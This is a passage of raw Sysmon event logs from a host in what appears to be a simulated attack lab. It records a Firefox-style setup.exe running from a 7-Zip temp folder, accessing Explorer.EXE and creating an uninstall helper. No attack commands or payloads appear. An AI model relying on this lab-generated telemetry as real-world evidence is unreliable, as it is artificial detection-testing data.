indows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\uninstall\helper.exe2021-01-18 13:59:52.692 10341000x800000000000000015594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
